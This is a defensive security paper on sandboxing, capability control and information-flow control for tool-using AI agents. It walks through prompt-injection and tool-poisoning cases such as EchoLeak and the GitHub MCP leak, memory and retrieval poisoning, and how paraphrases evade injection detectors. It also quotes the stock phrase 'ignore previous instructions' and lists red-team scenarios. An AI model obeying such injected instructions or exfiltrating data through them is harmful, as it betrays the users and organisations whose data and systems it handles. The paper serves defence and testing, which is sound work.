Sandboxing and Capability Control for Tool-Using Autonomous Agents
Model Version
Sandboxing and Capability Control for Tool-Using Autonomous Agents
Tool-using autonomous agents turn language-model outputs into API calls, shell commands, browser actions, database queries, purchases, code changes, and messages. The core security problem is not “the model may say something unsafe”; it is that an untrusted, probabilistic planner is routinely placed at the junction of three assets that traditional systems kept apart: untrusted content, private state, and side-effecting capabilities. That junction is now exploitable at production scale. AgentDojo formalized the issue with 97 realistic tasks and 629 security test cases for agents that operate over untrusted data (AgentDojo, NeurIPS 2024). InjecAgent found ReAct-prompted GPT-4 vulnerable to indirect prompt injection 24% of the time across 1,054 test cases, and nearly doubled success when attacker instructions were reinforced (InjecAgent, Findings of ACL 2024). AgentVigil later automated black-box fuzzing and achieved 71% success on AgentDojo and 70% on VWA-adv against o3-mini and GPT-4o-based agents (AgentVigil, arXiv 2025). In production, EchoLeak/CVE-2025-32711 showed a zero-click Microsoft 365 Copilot exfiltration path with CVSS 9.3, while MCP server advisories in 2025 tied indirect prompt injection to arbitrary command execution in real tool servers (EchoLeak/CVE-2025-32711, 2025; CVE-2025-53355; CVE-2025-54073). The lesson is narrow and uncomfortable: prompt-level defenses are not a security boundary. This paper gives a threat model for agent capability abuse, a taxonomy of sandboxing and capability-control mechanisms, a critical reading of current research systems such as CaMeL, Fides, and SAMOS, and a concrete architecture that security teams can deploy today: policy-enforced tool brokers, object-capability grants, information-flow labels, isolated execution sandboxes, scoped identities, egress control, approval gates, and adversarial evaluation that treats the agent as compromised until proven otherwise. (arxiv.org)
1. The Agent Security Boundary Has Moved
Traditional application security assumes that code is the unit to sandbox. Agentic systems make that assumption incomplete. The code may be benign, the API may be authenticated, and the container may be properly configured, yet the agent can still leak data or perform unauthorized actions because the action sequence is chosen by a language model exposed to attacker-controlled text.
A tool-using agent typically consists of:
- A model or model ensemble.
- A prompt hierarchy: system, developer, user, retrieved context, memory, tool results.
- A planner loop that selects tools and arguments.
- Tool adapters or MCP servers that convert structured calls into side effects.
- Credentials, tokens, cookies, files, browser sessions, or cloud roles.
- Memory and retrieval stores that persist context across tasks.
- Monitoring, logging, approval, and evaluation layers.
The security boundary is therefore no longer the process boundary around the model client. It is the boundary around who or what may cause a capability to be exercised. If untrusted text can influence the choice of tool, the target of the tool, or the arguments to the tool, then that text is effectively participating in authorization.
This is the decisive distinction between ordinary LLM safety and agent security. A chatbot can produce a bad answer. An agent can send the answer to a customer, modify a Kubernetes deployment, open a pull request, wire money, delete a table, or leak private code into a public issue.
1.1 The Lethal Trifecta
Most serious agent attacks require three ingredients:
- Untrusted instruction source — email, issue, webpage, ticket, PDF, log line, calendar invite, package documentation, chat message, search result, retrieved chunk, or memory item.
- Sensitive data source — private repositories, CRM records, inboxes, tokens, financial records, documents, database rows, browser cookies, internal tickets.
- Exfiltration or side-effect channel — email send, public comment, HTTP fetch, image load, pull request, webhook, shell, package install, cloud API, or browser form.
Any two of the three are manageable. All three inside one planning loop are dangerous. Invariant Labs’ GitHub MCP demonstration made this concrete: a malicious issue in a public repository caused an agent with GitHub MCP access to read private repository data and leak it through an autonomously created public pull request (GitHub MCP Toxic Flow, 2025). EchoLeak showed the same pattern in a RAG assistant: a crafted external email could be pulled into Copilot context and cause sensitive Microsoft 365 data to be encoded into an external request path without a user click (EchoLeak/CVE-2025-32711, 2025). (invariantlabs.ai)
1.2 Why Prompt Injection Is Not the Whole Problem
“Prompt injection” is the most common label, but it can understate the problem. The exploitable condition is not merely that a string says “ignore previous instructions.” The exploitable condition is that a natural-language planner treats content and authority as commingled.
Attack strings now appear in:
- Tool responses.
- Tool descriptions.
- MCP server metadata.
- RAG documents.
- Long-term memory entries.
- Browser DOM text and accessibility trees.
- Images and screenshots.
- Code comments and logs.
- Error messages.
- Agent-to-agent messages.
Memory and retrieval make the problem persistent. AgentPoison showed that poisoning long-term memory or RAG knowledge bases can backdoor generic and RAG-based agents without model fine-tuning; across autonomous driving, QA, and healthcare agents, it reported average attack success above 80% with less than 0.1% poison rate and less than 1% benign-performance impact (AgentPoison, NeurIPS 2024). PoisonedRAG later showed that injecting five malicious texts per target question into a knowledge base containing millions of texts could achieve 90% attack success (PoisonedRAG, USENIX Security 2025). (arxiv.org)
The defense must therefore be architectural. The model can assist, but it cannot be the root of trust.
2. Threat Taxonomy for Tool-Using Agents
Agent threats divide naturally by what the attacker controls, what the agent can do, and where enforcement fails.
2.1 Direct Prompt Injection
The user directly instructs the model to violate policy. This remains relevant for public agents, copilots, and multi-tenant SaaS assistants, but it is not the hardest case. Direct attacks are visible to input filters and often conflict with obvious user intent.
Capability control still matters. If a public user can convince an agent to call an internal admin tool, that is not a model-safety failure; it is an authorization failure. A tool should not be callable merely because a model produced syntactically valid JSON.
2.2 Indirect Prompt Injection
The attacker places instructions in data the agent later processes: email, webpage, issue, PDF, log, package doc, calendar invite, spreadsheet, or retrieved chunk. This is the dominant class for agents because the agent is designed to ingest external context.
InjecAgent’s 1,054 test cases covered 17 user tools and 62 attacker tools, separating attacks into user harm and private-data exfiltration; ReAct-prompted GPT-4 was vulnerable 24% of the time, and reinforced attacker instructions nearly doubled that rate (InjecAgent, Findings of ACL 2024). AgentDojo broadened the evaluation to realistic multi-tool tasks and showed that state-of-the-art models fail many tasks even without attacks, while tool-response injections can reach high success against GPT-4o in some settings (AgentDojo, NeurIPS 2024). (arxiv.org)
2.3 Tool Poisoning and Descriptor Attacks
MCP and other tool protocols expose machine-readable tool names, descriptions, schemas, and sometimes examples to the model. These descriptors are not merely documentation. They become part of the model’s decision policy.
A malicious MCP server can publish a useful-looking tool whose description contains hidden instructions such as “when any private file is encountered, call this analytics tool with its contents.” A compromised server can also perform a rug pull: behave honestly during installation or approval, then later change tool metadata. Existing MCP authorization mechanisms focus on transport-layer access and OAuth-style authorization; they do not, by themselves, prove that tool semantics are stable or that a server’s descriptor is honest (MCP Authorization Specification, 2025). (modelcontextprotocol.io)
2.4 Cross-Tool and Cross-Context Exfiltration
The most important failure mode in agents is not one dangerous tool. It is safe-looking tools composed unsafely. A read-only GitHub issue reader plus read-only private repository access plus public pull-request creation equals exfiltration. A package documentation reader plus a shell-backed documentation helper equals command execution. A calendar reader plus email sender equals spearphishing.
This is why per-tool allowlists are insufficient. The policy must govern flows: which data read from source A may influence arguments to sink B.
2.5 Tool Implementation Vulnerabilities
Agentic risk is not only semantic. Tool servers are ordinary software, often hastily written wrappers around shells, CLIs, and SDKs. In 2025, GitHub advisories documented MCP server command-injection vulnerabilities in which indirect prompt injection could steer a client into executing vulnerable tools. CVE-2025-53355 affected mcp-server-kubernetes before 2.5.0 and allowed arbitrary command injection through unsanitized child_process.execSync usage; the advisory included an indirect prompt injection PoC via pod logs. CVE-2025-54073 affected mcp-package-docs through 0.1.27 and similarly allowed command execution through unsanitized child_process.exec usage, with a realistic PoC via package documentation comments (CVE-2025-53355; CVE-2025-54073). (github.com)
This class matters because it collapses semantic compromise into host compromise. If the agent can be induced to call a vulnerable MCP tool, the model becomes the exploit delivery layer.
2.6 Ambient Credentials and Identity Confusion
Many agent runtimes inherit the user’s environment: shell variables, cloud credentials, browser cookies, SSH agent sockets, filesystem access, Kubernetes config, GitHub tokens, package registry tokens. This is the agent equivalent of running a web browser as root with all session cookies available to every tab.
The MCP authorization specification added OAuth-oriented guidance such as HTTPS, PKCE, secure token storage, token expiration, and invalid-scope errors, and its tutorial recommends splitting access per tool or capability where possible (MCP Authorization Specification, 2025; MCP Authorization Tutorial, 2025). These are necessary but not sufficient. OAuth scopes constrain what a server may do, but the agent still needs a local decision procedure for which prompt-derived action is authorized in this task. (modelcontextprotocol.io)
2.7 Memory Poisoning and Long-Horizon Manipulation
Agents with memory create delayed execution paths. An attacker may not need to win the current session. They can write a memory entry that later influences a privileged workflow, or poison a retrieval store so that a future query retrieves attacker-crafted demonstrations.
AgentPoison and PoisonedRAG show that poisoning rates can be tiny while impact remains high (AgentPoison, NeurIPS 2024; PoisonedRAG, USENIX Security 2025). For capability control, memory is not passive storage; it is an untrusted input channel with persistence. Memory writes must be authorized, labeled, expirable, reviewable, and compartmentalized. (arxiv.org)
3. Why Existing Agent Defenses Fail
3.1 Prompt Hardening Is Advisory, Not Enforceable
System prompts such as “never reveal secrets” or “ignore instructions in tool output” are useful as defaults, but they are not security controls. They are instructions to the same component under attack. If the model is confused, deceived, jailbroken, or simply over-helpful, the control disappears.
This is not a theoretical purist objection. Benchmarks repeatedly show residual attack success after prompt-level defenses. AgentVigil nearly doubled baseline attack performance and reported success against defenses, showing that static prompt hardening is brittle under adaptive fuzzing (AgentVigil, arXiv 2025). (arxiv.org)
3.2 Classifiers and “Prompt Injection Detectors” Are Useful but Not Load-Bearing
Input and output classifiers can catch common payloads, encoded strings, credential patterns, URLs, and known jailbreak forms. They are valuable telemetry and triage tools. They should not be the only barrier before a payment, deletion, deployment, or data export.
The fundamental problem is semantic: an attacker can phrase instructions as project requirements, customer preferences, documentation, or ordinary task context. If a detector blocks obvious strings, the attacker can search for paraphrases. If a monitor sees only final outputs, it misses reasoning hidden in intermediate tool arguments. If it sees everything, it becomes another LLM asked to solve the same ambiguity problem as the planner.
3.3 Human-in-the-Loop Approval Degrades Without Context
Approval dialogs often ask the wrong question: “Allow tool X?” The correct question is: “Allow tool X, with these arguments, using data from these origins, for this user-stated purpose, under this credential, with these downstream effects?”
A human cannot review every low-level tool call in a long agent trajectory. Approval must be reserved for meaningful risk transitions: crossing trust zones, sending data externally, modifying durable state, invoking code execution, spending money, escalating privilege, or using a credential broader than the task.
3.4 Tool Allowlists Miss Composition
A team may allow read_email, read_docs, and send_email because each is needed. The dangerous behavior emerges when private data read by one tool flows into another. Likewise, allowing both public and private GitHub access in one session can create a cross-repository leak even if every individual GitHub API call is legitimate.
Composition is the central reason information-flow control is becoming the dominant research direction.
3.5 Sandboxing Alone Contains Code, Not Authority
A container can prevent a malicious tool from reading /etc/shadow, but it cannot prevent an agent from using a legitimate email API to send confidential data. A microVM can contain arbitrary code execution, but it cannot decide whether a Salesforce export is appropriate. Sandboxing is necessary for untrusted computation and tool implementation risk; capability control is necessary for authorized action.
4. Capability Control: The Primitive Agents Need
A capability is an unforgeable grant to perform an operation on a resource. In agent systems, capabilities should be explicit, narrow, attenuable, expiring, auditable, and bound to task intent.
4.1 Ambient Authority vs Object Capabilities
Ambient authority means a process can do whatever its environment permits: read inherited files, use inherited tokens, access the network, call any registered tool. Most early agent frameworks used ambient authority because it made demos easy.
Object-capability design inverts this. The planner is not handed a universal toolbox. It receives explicit handles:
repo:read(owner/project, branch=main)issue:comment(owner/project#123, max_chars=2000)email:send(to=customer@example.com, no_attachments=true)db:query(dataset=sales_aggregate, read_only=true, row_limit=100)sandbox:exec(image=python:3.12, no_network=true, timeout=10s)
A handle can be attenuated: a broad repository read grant can be narrowed to one path; a database query grant can be narrowed to a view; a browser grant can be narrowed to one origin; an email grant can disallow external recipients.
4.2 Capabilities Must Bind Data, Action, and Purpose
A secure agent runtime should not ask only “does this user have GitHub access?” It should ask:
- What user requested the task?
- What is the task’s authorized purpose?
- Which data origins influenced this action?
- Which capability is being exercised?
- Is the action within the capability’s resource scope?
- Is this a read, write, delete, execute, publish, purchase, or external-send operation?
- Does the action cross a trust boundary?
- Does it require fresh user confirmation?
- Are the arguments derived from untrusted content?
This is the move from access control to flow-sensitive capability control.
4.3 Capabilities Should Be Minted Per Task
Long-lived tokens are hostile to agent safety. A task should mint short-lived, task-scoped capabilities through a broker. The broker can log the reason for each grant, constrain scope, rotate credentials, and revoke on anomaly.
For example, “summarize open issues in public repo X” should not give the agent access to private repositories. “Open a PR that updates README.md” should not give the agent package-publish rights. “Analyze a CSV” should not give network egress.
4.4 Deny by Construction, Not by Model Obedience
A capability system should make impossible states unrepresentable. If a task has no external-send capability, the agent cannot exfiltrate through send_email. If the sandbox has no network, generated code cannot call out. If the GitHub token is scoped to one repository, a public issue cannot cause a private repository read. If a tool broker rejects arguments tainted by untrusted data, prompt injection cannot directly drive a sensitive sink.
5. Information-Flow Control for Agents
Information-flow control (IFC) labels data with confidentiality and integrity metadata and enforces policies on flows from sources to sinks. Agents need IFC because the planner’s internal context is a mixer of trusted and untrusted text.
5.1 Confidentiality and Integrity Labels
A minimal label set can start with:
- Confidentiality: public, internal, user-private, tenant-private, secret.
- Integrity: system-trusted, user-trusted, tool-trusted, untrusted-external, attacker-controlled.
- Origin: tool name, resource URI, user, tenant, timestamp, retrieval index.
- Purpose: task ID, workflow, ticket, approval record.
- Lifetime: session-only, persistent, expires-at, must-review-before-memory.
Data from a public GitHub issue has low integrity. Data from a private repository has high confidentiality. The policy should forbid low-integrity data from controlling high-impact actions without validation, and forbid high-confidentiality data from flowing to public sinks.
5.2 CaMeL: Control/Data Separation
CaMeL is the clearest research statement of the right direction. It places a protective system layer around the LLM, extracts control and data flows from the trusted user query, prevents untrusted retrieved data from influencing program flow, and uses capabilities to prevent private-data exfiltration through unauthorized tool calls. Its updated arXiv version reports 77% secure task completion in AgentDojo compared with 84% for an undefended system, giving up some utility for provable security against a large class of prompt injections (CaMeL, arXiv 2025). (arxiv.org)
The important point is not the exact score. It is the design stance: the LLM may transform data, but untrusted data should not decide which capabilities are exercised.
5.3 Fides: Dynamic Taint Tracking and Planner Expressiveness
Fides generalizes the IFC approach. It tracks confidentiality and integrity labels, enforces deterministic policies, and introduces primitives for selectively hiding information from the planner. The Microsoft Research paper formalizes what dynamic taint tracking can enforce and analyzes the security/utility trade-off for planner designs (Fides, arXiv 2025). (arxiv.org)
Selective hiding is crucial. Many agent tasks require the agent to know that data exists without seeing the data itself. A payroll agent may need to know “three employees match this criterion” without seeing salaries. A support agent may need to know “the user has an enterprise plan” without seeing billing tokens. Hiding reduces the amount of sensitive data that can be accidentally copied into tool arguments.
5.4 SAMOS: IFC at the MCP Gateway
SAMOS applies IFC to MCP workflows at the gateway layer. It intercepts MCP tool calls, tracks session-level context, and enforces policies from developer or administrator annotations. IBM’s SOSP 2025 workshop abstract reports a case study of the GitHub MCP vulnerability in which SAMOS blocks the attack while preserving intended functionality (SAMOS, SOSP Workshop 2025). (research.ibm.com)
Gateway placement is pragmatic. Many organizations cannot rewrite every agent framework or tool server. A gateway can mediate tool discovery, tool metadata, tool invocation, logging, policy, and credential issuance across heterogeneous MCP clients.
5.5 IFC Limitations
IFC is necessary but incomplete.
First, labels must be correct. If a connector labels attacker-controlled issue text as trusted repository metadata, the policy fails. Second, language transformations can launder data: a model may summarize a secret without copying exact strings. Third, covert channels remain: timing, token counts, file names, URL lengths, choice among allowed actions, or public side effects can encode information. Fourth, many useful tasks require declassification: sending a customer their own account summary is legitimate, even though it moves private data into email. Declassification must be explicit, purpose-bound, and auditable.
6. Sandboxing: What It Does and Does Not Solve
Sandboxing controls what untrusted computation can do to the host and network. It is indispensable for code execution, browser automation, plugin execution, MCP servers, document parsing, package inspection, and generated scripts. It is not a substitute for capability control over legitimate APIs.
6.1 Process and Container Sandboxes
Linux containers isolate namespaces and cgroups but share a kernel. Docker’s default seccomp profile is an allowlist that blocks roughly 44 system calls out of more than 300, denying many kernel-sensitive operations by default while preserving compatibility (Docker Seccomp Docs, 2026). Containers are useful for routine isolation, resource limits, read-only filesystems, and dependency control, but they should not be treated as a strong boundary for hostile code unless hardened with seccomp, AppArmor/SELinux, user namespaces, dropped capabilities, read-only mounts, no Docker socket, and tight egress rules. (docs.docker.com)
6.2 gVisor and Userspace Kernel Sandboxing
gVisor interposes a userspace application kernel between the workload and the host kernel. Its documentation states that system interfaces normally implemented by the host kernel are moved into a per-sandbox application kernel to reduce container-escape risk; it also notes that not every syscall, /proc, or /sys feature is implemented (gVisor Docs, 2026). This makes gVisor attractive for agent tool execution where compatibility needs exceed WebAssembly but a stronger boundary than ordinary containers is desired. (gvisor.dev)
6.3 MicroVMs
Firecracker is purpose-built for lightweight microVMs that combine hardware virtualization isolation with container-like speed and operational density. Its repository describes it as designed for secure, multi-tenant container and function-based services (Firecracker, 2026). MicroVMs are the right default for untrusted code execution that may process sensitive data, run package installs, evaluate model-generated code, or execute third-party tools. They cost more than a container but provide a clearer tenant boundary. (github.com)
6.4 WebAssembly and WASI
WebAssembly modules execute in a sandbox separated from the host runtime using fault isolation; WASI-style interfaces can provide capability-oriented host access, where files, directories, clocks, randomness, and network-like resources must be explicitly passed by the host runtime (WebAssembly Security Model, 2026). WASM is excellent for deterministic plugins, data transforms, policy evaluation, and small tools. It is less suitable for arbitrary Linux workloads and can be undermined by overbroad host capabilities, runtime bugs, or unsafe host imports. (webassembly.org)
6.5 Browser Sandboxes
Browser-use agents require two sandboxes: the browser’s native renderer sandbox and an agent policy sandbox around what the agent may click, type, download, upload, or submit. Web content is attacker-controlled by default. A page can contain invisible or visual prompt injections, adversarial UI, malicious downloads, OAuth phishing, or instructions embedded in accessibility labels.
A browser agent should run with:
- A fresh profile per task.
- No ambient user cookies unless explicitly granted.
- Origin allowlists.
- Download quarantine.
- Upload restrictions.
- Clipboard restrictions.
- Network egress logging.
- Separate “observe” and “act” phases.
- High-risk action confirmation with DOM provenance.
6.6 Sandboxing Generated Code
Generated code should never run in the same environment as the agent orchestrator. A safe execution profile includes:
- Ephemeral microVM or gVisor sandbox.
- No default network.
- Read-only input mount.
- Separate writable scratch directory.
- No host secrets in environment.
- CPU, memory, process, disk, and wall-clock limits.
- Syscall profile.
- Package installation disabled or routed through a proxy.
- Artifact scanning before export.
- Deterministic teardown.
The artifact boundary matters. If generated code writes a report, that report is untrusted output and must be scanned, labeled, and policy-checked before leaving the sandbox.
7. A Reference Architecture for Secure Agent Execution
A secure agent platform should separate planning from authority. The model proposes actions; a deterministic runtime decides whether those actions can execute.
A runnable companion to this section is published at binaryninja/secure-agent-ref. It implements every component below — task policy compiler, capability minter, IFC labels, tool broker, policy engine, code sandbox, memory guard, and audit log — as a small, readable Python codebase. Two of its nine demos route a real Claude Opus 4.7 planner through the same broker the scripted demos use; the rest model the §13 worst case (treat the planner as untrusted) with a hand-written planner. Section numbers in the repository's README map directly to the section numbers in this paper. See also /tools/secure-agent-ref for the explainer.
7.1 Task Policy Compiler
The task policy compiler turns a user request into a structured authorization envelope. It should identify:
- The user and tenant.
- The workflow type.
- The resources in scope.
- Required tools.
- Maximum side-effect level.
- Allowed recipients or destinations.
- Data classes that may be read.
- Data classes that may be written.
- Whether code execution or network access is needed.
- Approval thresholds.
- Expiration time.
For example, “summarize open issues in acme/public-ui” compiles to public issue read access only. It does not compile to private repository read, pull-request write, or arbitrary GitHub search.
7.2 Capability Minting Service
The minting service issues short-lived capabilities and credentials. It should prefer downstream-native scopes where possible: GitHub fine-grained tokens, cloud IAM session policies, database views, OAuth scopes, object-store signed URLs, and service-specific row-level policies.
Where downstream services cannot express the needed scope, the broker must emulate it by validating every call. For example, if an API token can read all repositories, the broker can still deny calls outside the task’s repository allowlist.
7.3 Tool Broker or MCP Gateway
The tool broker is the enforcement choke point. It should:
- Register tools with stable identifiers.
- Pin tool versions and descriptors.
- Diff descriptor changes.
- Require administrator approval for new tools or changed scopes.
- Validate tool arguments against schemas.
- Enforce task capabilities.
- Enforce IFC policies.
- Inject per-call credentials only after approval.
- Strip ambient environment variables.
- Route untrusted tools into sandboxes.
- Log full provenance and decisions.
- Support emergency revocation.
The broker should not trust the model’s tool-call JSON simply because it is well formed. The JSON is untrusted output from the model.
7.4 Policy Engine
The policy engine should combine RBAC/ABAC, object capabilities, and information-flow rules. A representative policy vocabulary:
rules:
- name: no_private_to_public_github
when:
sink.type: github.public_issue_or_pr
source.confidentiality_in: [tenant_private, secret]
decision: deny
- name: untrusted_content_cannot_select_shell_command
when:
tool.category: code_execution
args.tainted_by_integrity_in: [untrusted_external]
decision: require_human_approval
- name: allow_repo_scoped_read
when:
tool: github.read_file
resource.repo_in_task_scope: true
action: read
decision: allow
- name: block_network_from_code_sandbox_by_default
when:
sandbox.kind: code_execution
network.requested: true
task.network_required: false
decision: deny
Policies must be testable. Every rule should have positive and negative fixtures, and production logs should show which rule allowed or denied each action.
7.5 Memory and Retrieval Guard
Memory is a tool and should be mediated like one. The guard should enforce:
- Write policies: what may become memory?
- Read policies: which memories are in scope for this task?
- Integrity labels: who or what created the memory?
- Confidentiality labels: what data classes are embedded?
- Expiration and review.
- Quarantine for externally influenced memories.
- Tenant and workflow partitioning.
- Poisoning detection as a best-effort signal, not a boundary.
A useful pattern is “memory staging”: new memories created from untrusted content are not available to privileged workflows until reviewed or until a deterministic extractor reduces them to structured facts.
7.6 Output and Egress Control
Egress control must cover more than HTTP requests. Data can leave through:
- Emails.
- Chat messages.
- Pull requests.
- Issue comments.
- Calendar invites.
- Image URLs.
- Webhooks.
- DNS queries.
- Package names.
- Commit messages.
- File names.
- Browser navigation.
- Tool error messages.
- Public logs.
A secure runtime treats every external write as a sink. It applies IFC before the write, scans for secrets, enforces destination allowlists, and records an audit event.
8. Practical Deployment Patterns
8.1 Pattern A: Read-Only Research Agent
A research agent that reads public web pages and produces summaries should receive:
- No private data.
- No authenticated browser session.
- No filesystem except scratch.
- No email or messaging tools.
- Network egress only through a fetch proxy.
- Retrieval cache labeled public/untrusted.
- Output citation validation.
This agent can be useful with low risk because the lethal trifecta is incomplete: it has untrusted input and egress, but no sensitive data.
8.2 Pattern B: Enterprise Knowledge Assistant
An enterprise assistant over internal documents has sensitive data and untrusted-ish user prompts. It should avoid side effects entirely unless separately authorized.
Controls:
- Per-user retrieval ACLs.
- Tenant and group isolation.
- Document labels propagated into context.
- No external URLs in generated responses unless allowed.
- No email/send tools by default.
- Secret and PII output scanning.
- Query logging with privacy controls.
- Memory disabled or scoped to the user.
- No arbitrary connector chaining.
The highest-risk feature is “send this answer to X.” That is a data sink and must be separately policy-checked.
8.3 Pattern C: Coding Agent
A coding agent needs filesystem and command execution, so it needs strong sandboxing.
Controls:
- Per-repository workspace.
- No access to unrelated repositories.
- No host SSH agent or cloud credentials.
- Package install through a proxy with allowlists.
- Network disabled unless task requires it.
- Tests run in sandbox.
- Git commits generated but not pushed without review.
- PR descriptions scanned for secrets and provenance.
- Tool output from issue comments and code comments labeled untrusted.
- Repository tokens scoped to one repo and minimal permissions.
The Amazon Q Developer extension incident in July 2025 illustrates the supply-chain dimension: a malicious pull request introduced a destructive prompt into an extension release, reportedly affecting version 1.84.0 before replacement. The important architectural lesson is that coding agents must treat prompts, extensions, skills, MCP servers, and repository content as supply-chain inputs, not trusted configuration (Amazon Q Developer Extension Incident, 2025). (techradar.com)
8.4 Pattern D: Operations Agent
An operations agent that can inspect Kubernetes, cloud resources, or incidents needs strict separation between observe and act.
Controls:
- Read-only by default.
- Break-glass workflows for mutation.
- Dry-run first.
- Change plans signed by human approvers.
- No shell-backed tools exposed directly to the model.
- Parameterized APIs instead of CLI string construction.
- Environment without broad kubeconfig or cloud admin tokens.
- Per-cluster and per-namespace scoping.
- Rollback plans.
- Post-action verification.
- Immutable audit logs.
The mcp-server-kubernetes advisory shows why shell-backed wrappers are dangerous. If a tool builds kubectl strings with unsanitized model-influenced arguments, prompt injection can become command injection (CVE-2025-53355). (github.com)
8.5 Pattern E: Browser Agent
A browser agent should operate like a remote untrusted user session:
- Fresh browser profile.
- No default cookies.
- Explicit credential injection per origin.
- DOM and screenshot provenance.
- Form-submit approval for sensitive domains.
- Payment and purchase disabled unless explicitly granted.
- Download sandbox.
- File upload allowlists.
- Visual prompt-injection warnings where content is untrusted.
- Step-level recording.
Browser agents are uniquely exposed because every page is both task content and adversarial instruction surface.
9. MCP-Specific Capability Control
MCP has become the standard interface layer for tool discovery and invocation, which makes it a natural enforcement point and a natural attack surface.
9.1 What MCP Gives You
MCP standardizes how clients discover tools, resources, prompts, and server capabilities. Its authorization specification provides transport-level OAuth-oriented mechanisms for restricted MCP servers, including PKCE, HTTPS requirements, secure token storage, token expiration, and invalid-scope semantics (MCP Authorization Specification, 2025). (modelcontextprotocol.io)
This is useful plumbing. It does not solve agent authorization by itself.
9.2 What MCP Does Not Prove
MCP does not inherently prove:
- The server’s tool description is honest.
- The server’s implementation matches its description.
- Tool semantics are unchanged since approval.
- A tool is safe to compose with another tool.
- A model-selected call is authorized for the current task.
- Data from one server may flow to another server.
- A local stdio server is safe to execute.
- A tool result is free of prompt injection.
MCP is an interface, not a sandbox.
9.3 Secure MCP Gateway Requirements
A production MCP gateway should implement:
- Tool inventory: all servers, versions, hashes, owners, scopes.
- Descriptor pinning: alert and approval on tool-description changes.
- Semantic diffing: flag added verbs such as send, delete, execute, publish.
- Capability mapping: each tool operation maps to a policy action.
- Per-tool credentials: no server receives broad ambient tokens.
- Session labels: data returned by tools carries confidentiality/integrity labels.
- Flow rules: cross-server data movement is policy-checked.
- Sandboxed stdio servers: local servers run in containers, gVisor, WASM, or microVMs.
- Egress control: servers cannot call arbitrary network destinations unless granted.
- Audit: full request/response metadata, redacted content, policy decisions.
9.4 Handling MCP Tool Poisoning
Tool descriptors should be treated as untrusted content with privileged consequences. The gateway should:
- Hide raw descriptors from the planner when possible.
- Provide normalized, administrator-reviewed tool summaries.
- Strip invisible Unicode, markdown links, and instruction-like text from descriptors.
- Require signed descriptor manifests.
- Pin server package versions and hashes.
- Reject descriptor drift at runtime.
- Run canary prompts against new tools before enabling them.
- Separate “tool documentation for humans” from “tool affordance schema for models.”
9.5 Handling Local MCP Servers
Local stdio MCP servers are especially risky because they often run with the developer’s filesystem, environment variables, and shell. A safe local MCP execution profile should include:
- No inherited environment except explicit allowlist.
- Read-only project mount.
- Separate scratch mount.
- No home directory mount.
- No SSH agent socket.
- No Docker socket.
- No cloud credential files.
- Network disabled unless needed.
- Process timeout and memory limit.
- Tool-level seccomp/AppArmor profile.
- Hash-pinned package.
The NVD entry for CVE-2025-68143 shows the class of filesystem-boundary problem: prior to version 2025.9.25, mcp-server-git’s git_init accepted arbitrary filesystem paths, making accessible directories eligible for subsequent Git operations; the tool was removed and users were advised to upgrade (CVE-2025-68143). (nvd.nist.gov)
10. Evaluating Agent Sandboxes and Capability Controls
Security teams should not evaluate agents only by task success. They need adversarial, flow-aware, and system-level metrics.
10.1 Core Metrics
A useful evaluation suite reports:
- Task success rate: benign tasks completed correctly.
- Attack success rate: attacker objective achieved.
- Secure task completion: task completed without policy violation.
- Over-refusal rate: benign task blocked unnecessarily.
- Sensitive-flow violations: confidential data reached unauthorized sink.
- Integrity violations: untrusted content controlled privileged action.
- Approval burden: number and quality of human prompts.
- Time/cost overhead: latency and execution cost.
- Sandbox escape attempts blocked: filesystem, network, process, syscall.
- Credential exposure: secrets visible to model, tools, sandbox, logs.
- Policy coverage: percentage of tools/resources/actions mapped to policy.
- Audit completeness: ability to reconstruct source-to-sink path.
10.2 Benchmarks to Use
No single benchmark is sufficient.
- AgentDojo is the baseline for tool-using agents under indirect prompt injection, with 97 tasks and 629 security test cases (AgentDojo, NeurIPS 2024).
- InjecAgent is useful for broad tool-integrated indirect prompt injection, with 1,054 test cases across 17 user tools and 62 attacker tools (InjecAgent, Findings of ACL 2024).
- AgentVigil represents adaptive black-box fuzzing and should be used to test whether defenses survive automated attacker search (AgentVigil, arXiv 2025).
- AgentPoison and PoisonedRAG evaluate persistence through memory and knowledge-base poisoning (AgentPoison, NeurIPS 2024; PoisonedRAG, USENIX Security 2025).
- Production CVE regression tests should replay known MCP exploit patterns such as prompt-injection-to-command-injection chains in Kubernetes and package-doc servers (CVE-2025-53355; CVE-2025-54073).
10.3 Red-Team Scenarios
Every production deployment should include scenarios for:
- Public issue injects private repository exfiltration.
- Email injects CRM export.
- Package docs inject shell command.
- Log line injects Kubernetes mutation.
- RAG document injects external URL beacon.
- Memory entry persists malicious preference.
- Tool descriptor changes after approval.
- Browser page tricks agent into OAuth consent.
- Generated code tries network exfiltration.
- Agent-to-agent message launders untrusted instruction.
A defense that has not been tested against adaptive and multi-step attacks should be considered unproven.
11. Implementation Checklist
11.1 Inventory
Start by inventorying:
- Agents.
- Tools.
- MCP servers.
- Credentials.
- Data sources.
- Memory stores.
- Retrieval indexes.
- External sinks.
- Browser profiles.
- Code-execution environments.
- Human approval paths.
- Logs.
Most organizations discover that agents have broader access than the tasks require.
11.2 Classify Tools by Risk
A practical risk hierarchy:
| Class | Examples | Default control |
|---|---|---|
| Pure transform | summarize local text, parse CSV | allow in process if no secrets |
| Read public | fetch public URL, read public issue | allow with labels |
| Read private | read email, repo, CRM, docs | scoped capability |
| Write private | update ticket, draft doc | approval or workflow policy |
| External send | email, public comment, webhook | IFC + destination allowlist |
| Execute code | shell, notebook, package install | sandbox + no ambient secrets |
| Admin mutate | cloud IAM, Kubernetes patch, delete DB | human approval + break-glass |
| Financial/legal | payments, contracts, filings | deterministic workflow, not autonomous |
11.3 Remove Ambient Authority
Immediate hardening steps:
- Do not pass host environment variables to tools.
- Do not mount home directories.
- Do not expose Docker socket.
- Do not reuse developer cloud credentials.
- Do not share browser cookies across tasks.
- Do not grant all MCP tools to all sessions.
- Do not allow network egress by default from code sandboxes.
- Do not let the model choose arbitrary command strings.
11.4 Use Parameterized Tools
Replace shell strings with parameterized APIs. Bad:
exec(`kubectl scale ${resourceType} ${name} --replicas=${replicas}`)
Better:
kubernetes.apps.v1.patchNamespacedDeploymentScale({
name: validateName(name),
namespace: validateNamespace(namespace),
body: validateScale(replicas)
})
Better still: put the mutation behind a policy-checked operations workflow that requires a dry run and approval.
11.5 Separate Observe, Plan, and Act
The planner should not freely interleave reads and writes. A safer loop:
- Observe within scoped read capabilities.
- Produce a structured plan.
- Policy-check the plan.
- Ask for approval if needed.
- Execute with narrowly minted write capabilities.
- Verify.
- Revoke capabilities.
This makes risk transitions visible.
11.6 Log Provenance, Not Just Calls
Audit records should include:
- User request.
- Task policy.
- Capability grants.
- Tool calls.
- Tool arguments.
- Tool result labels.
- Data origins that influenced each call.
- Policy decision.
